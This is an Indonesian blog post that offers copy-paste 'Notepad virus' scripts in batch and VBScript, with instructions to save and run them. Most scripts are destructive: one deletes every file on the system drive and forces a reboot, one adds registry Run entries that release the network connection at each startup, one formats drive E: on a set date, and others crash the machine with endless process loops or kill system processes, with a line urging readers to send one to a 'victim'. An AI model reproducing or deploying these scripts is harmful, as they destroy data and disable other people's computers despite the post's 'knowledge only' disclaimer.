Thursday, November 7, 2019

Virus Notepad



IMP. Catatan >> Saya tidak bertanggung jawab atas kerusakan atau kesalahan pelaporan di komputer Anda yang melakukannya sebagai risiko Anda sendiri. Pengodean ini hanya untuk konsep pengetahuan.

Semua Skrip Di Sini Akan Disalin Dalam Note Pad

>> Virus Ini Menghapus Semua Konten Drive ...
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00


Simpan Kode Di Atas dalam file .bat

>> Nonaktifkan Internet Secara Permanen
Save As A bat File

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE



>> Virus Paling Sederhana Untuk Menghancurkan Jendela
@Echo off
Del C:\ *.* |y

Save It As Anything.bat

>> Ini Akan Menghancurkan Komputer Anda
Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)

Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
Next


Save It As Anything.vbs

Ini Hanya Bekerja Dengan Windows XP

>> Notes Tanpa Batas

* Ini akan memunculkan notes yang tidak berujung hingga komputer macet dan macet *

Code:-

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


>> Bom Virus
Salin Tempel Yang Berikut
 
If %date% NEQ 2009/11/25 goto exit
format E: /y >nul
:exit
exit


Dan Simpan Ini Sebagai Apa Pun

Catatan: - Anda Dapat Mengubah Tanggal (2009/11/25) Dari Virus Dan Lokasi (format E:) Yang Di Kerjanya
Virus Akan Berlaku Pada Hari Itu

>> Kunci topi gila

* Ini terus-menerus mengaktifkan dan menonaktifkan kunci caps sangat cepat terus menerus *

Code:-

Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop


>> Masuk Tanpa Batas

* Ini terus-menerus membuatnya sehingga tombol enter ditekan terus-menerus *

Code:-

Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop


>> Backspace Tanpa Akhir

* Ini membuatnya jadi tombol backspace terus ditekan *

Code:-

MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop


Apa jenis kelamin komputer Anda?

-> buka notepad
-> menyalin kode

CreateObject ("SAPI.SpVoice"). Bicaralah "I love YOU"

-> n tempel di Notepad
-> simpan sebagai> love.vbs
-> klik dua kali di atasnya

Jadikan Keyboard Anda Disco Light

Trik ini hanya membuat lampu keyboard Anda disko.
Script yang saya bagikan dengan Anda, ketika dieksekusi membuat flash light Caps, Num dan Scroll Lock Anda dengan cara berirama keren!

1. Bagian kode ini menjadikan keyboard Anda disko langsung ..

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop


2. Yang ini membuatnya tampak seperti rantai cahaya ....

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 200
wshshell.sendkeys “{CAPSLOCK}”
wscript.sleep 100
wshshell.sendkeys “{NUMLOCK}”
wscript.sleep 50
wshshell.sendkeys “{SCROLLLOCK}”
loop


Instruksi:
* rekatkan salah satu dari dua kode di atas dalam notepad
* Simpan sebagai "AnyFileName" .vbs
* Jalankan file
* Untuk berhenti, buka task manager dan kemudian di bawah "Proses" dan "wscript.exe"

Saya harap kamu akan menyukainya .. 😉

>> Tugas Membunuh

@echo off

start calc

tskill msnmsgr

tskill firefox

tskill iexplore

tskill LimreWire

tskill explorer

tskill explorer

tskill explorer

tskill explorer

tskill explorer

pause


simpan ini sebagai file .bat dan kirim dan hancurkan korban & k! ll Operasikan! ng systeM!

>> Ketikkan kode di notepad
@echo off
shutdown -r -f -t 00

Form Of Switches

-s
Shuts down the PC.

-l
Logs off the current user.

-t nn

Menunjukkan durasi penundaan, dalam detik, sebelum melakukan tindakan.

-c “messagetext”

Menampilkan pesan di jendela System Shutdown. Maksimal 127 karakter dapat digunakan. Pesan harus dilampirkan dalam tanda kutip.

-f
Memaksa semua aplikasi yang berjalan untuk dimatikan.

-r
Reboot PC. .. !! ..!

>> Menggerakkan Drive CD

* Ini akan membuat CD drive terus-menerus keluar *

Code:-

Set oWMP = CreateObject(”WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop


>> Untuk membuat bicara pc Anda

Buka file teks di notepad dan tulis:

Dim msg, sapi
msg=InputBox(“Enter your text”,”Talk it”)
Set sapi=CreateObject(“sapi.spvoice”)
sapi.Speak msg

Simpan file dengan ekstensi (* .vbs), itu akan membuat File VBScript.
Ini akan meminta Anda untuk teks ketika Anda membuka file, memasukkan teks dan tekan ok. "

kamu akan mendengar sekarang apa yang kamu ketik ..

ini bekerja di xp, vista, win7 juga.

enjoy !!!

No comments:

Post a Comment